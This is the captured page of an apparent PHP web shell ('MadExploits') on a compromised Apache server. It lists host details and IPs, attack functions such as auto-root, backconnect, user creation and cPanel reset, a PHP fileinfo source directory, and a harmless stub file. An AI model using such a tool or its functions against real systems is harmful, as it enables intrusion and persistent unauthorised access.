Linux ip-172-26-2-223 5.4.0-1018-aws #18-Ubuntu SMP Wed Jun 24 01:15:00 UTC 2020 x86_64
Apache
: 172.26.2.223 | : 18.188.59.124
Cant Read [ /etc/named.conf ]
8.1.13
www
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
www /
server /
php /
81 /
src /
ext /
fileinfo /
[ HOME SHELL ]
Name
Size
Permission
Action
.libs
[ DIR ]
drwxr-xr-x
autom4te.cache
[ DIR ]
drwxr-xr-x
build
[ DIR ]
drwxr-xr-x
include
[ DIR ]
drwxr-xr-x
libmagic
[ DIR ]
drwxr-xr-x
modules
[ DIR ]
drwxr-xr-x
tests
[ DIR ]
drwxr-xr-x
CREDITS
92
B
-rw-r--r--
Makefile
17.25
KB
-rw-r--r--
Makefile.frag
58
B
-rw-r--r--
Makefile.fragments
74
B
-rw-r--r--
Makefile.objects
8.41
KB
-rw-r--r--
config.h
1.75
KB
-rw-r--r--
config.h.in
1.65
KB
-rw-r--r--
config.log
19.57
KB
-rw-r--r--
config.m4
1.52
KB
-rw-r--r--
config.nice
114
B
-rwxr-xr-x
config.status
20.77
KB
-rwxr-xr-x
config.w32
542
B
-rw-r--r--
configure
431.5
KB
-rwxr-xr-x
configure.ac
5.17
KB
-rw-r--r--
create_data_file.php
472
B
-rw-r--r--
data_file.c
40.56
MB
-rw-r--r--
fileinfo.c
12.21
KB
-rw-r--r--
fileinfo.dep
5.05
KB
-rw-r--r--
fileinfo.la
808
B
-rw-r--r--
fileinfo.lo
307
B
-rw-r--r--
fileinfo.stub.php
1.45
KB
-rw-r--r--
fileinfo_arginfo.h
3.67
KB
-rw-r--r--
generate_patch.sh
358
B
-rw-r--r--
libmagic.patch
85.56
KB
-rw-r--r--
libtool
206.17
KB
-rwxr-xr-x
magicdata.patch
1.53
KB
-rw-r--r--
php_fileinfo.h
1.34
KB
-rw-r--r--
run-tests.php
137.54
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : fileinfo.stub.php
<?php /** @generate-class-entries */ /** @not-serializable */ class finfo { /** @alias finfo_open */ public function __construct(int $flags = FILEINFO_NONE, ?string $magic_database = null) {} /** * @param resource|null $context * @tentative-return-type * @alias finfo_file */ public function file(string $filename, int $flags = FILEINFO_NONE, $context = null): string|false {} /** * @param resource|null $context * @tentative-return-type * @alias finfo_buffer */ public function buffer(string $string, int $flags = FILEINFO_NONE, $context = null): string|false {} /** * @return bool * @alias finfo_set_flags */ public function set_flags(int $flags) {} // TODO make return type void } /** @refcount 1 */ function finfo_open(int $flags = FILEINFO_NONE, ?string $magic_database = null): finfo|false {} function finfo_close(finfo $finfo): bool {} function finfo_set_flags(finfo $finfo, int $flags): bool {} // TODO make return type void /** * @param resource|null $context * @refcount 1 */ function finfo_file(finfo $finfo, string $filename, int $flags = FILEINFO_NONE, $context = null): string|false {} /** * @param resource|null $context * @refcount 1 */ function finfo_buffer(finfo $finfo, string $string, int $flags = FILEINFO_NONE, $context = null): string|false {} /** * @param resource|string $filename * @refcount 1 */ function mime_content_type($filename): string|false {}
Close